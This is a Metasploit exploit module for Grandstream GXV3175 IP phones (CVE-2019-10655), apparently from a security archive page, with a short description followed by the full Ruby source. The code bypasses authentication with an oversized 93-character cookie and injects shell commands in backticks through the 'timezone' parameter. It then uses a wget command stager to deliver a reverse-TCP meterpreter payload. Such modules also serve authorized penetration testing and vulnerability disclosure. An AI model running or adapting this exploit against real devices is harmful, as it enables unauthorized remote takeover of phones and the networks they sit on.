Grandstream GXV3175 Unauthenticated Command Execution

This Metasploit module exploits a command injection vulnerability in Grandstream GXV3175 IP multimedia phones. The settimezone action does not validate input in the timezone parameter allowing injection of arbitrary commands. A buffer overflow in the phonecookie cookie parsing allows authentication to be bypassed by providing an alphanumeric cookie 93 characters in length. This module was tested successfully on Grandstream GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19.


MD5 | d0714d342ba12f124e7b2588f1b2bde6

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze

def initialize(info = {})
super(
update_info(
info,
'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
'Description' => %q{
This module exploits a command injection vulnerability in Grandstream GXV3175
IP multimedia phones. The 'settimezone' action does not validate input in the
'timezone' parameter allowing injection of arbitrary commands.

A buffer overflow in the 'phonecookie' cookie parsing allows authentication
to be bypassed by providing an alphanumeric cookie 93 characters in length.

This module was tested successfully on Grandstream GXV3175v2
hardware revision V2.6A with firmware version 1.0.1.19.
},
'Author' => [
'alhazred', # Command injection vulnerability discovery and exploit
'Brendan Scarvell', # Auth bypass discovery
'bcoles' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' => [
[ 'CVE', '2019-10655' ],
[ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
[ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
},
'DisclosureDate' => '2016-09-01',
'Privileged' => true,
'Arch' => ARCH_ARMLE,
'DefaultOptions' => {
'PrependFork' => true,
'MeterpreterTryToFork' => true,
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget'
},
'CmdStagerFlavor' => %w[wget],
'Targets' => [
['Automatic', {}]
],
'DefaultTarget' => 0
)
)
end

def check
res = send_request_cgi(
'uri' => '/manager',
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
'vars_get' => {
'action' => 'settimezone',
'timezone' => ''
}
)

if res && res.code == 200 && res.body.to_s.include?('Response=Success')
return CheckCode::Detected('phonecookie authentication bypassed successfully.')
end

CheckCode::Safe
end

def execute_command(cmd, _opts)
res = send_request_cgi(
'uri' => '/manager',
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
'vars_get' => {
'action' => 'settimezone',
'timezone' => "`#{cmd}`"
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
unless res.code == 200
fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
end
unless res.body.to_s.include?('Response=Success')
fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
end
end

def exploit
execute_cmdstager(
linemax: 220, # 255 minus URL encoding
background: true
)
end
end

Related Posts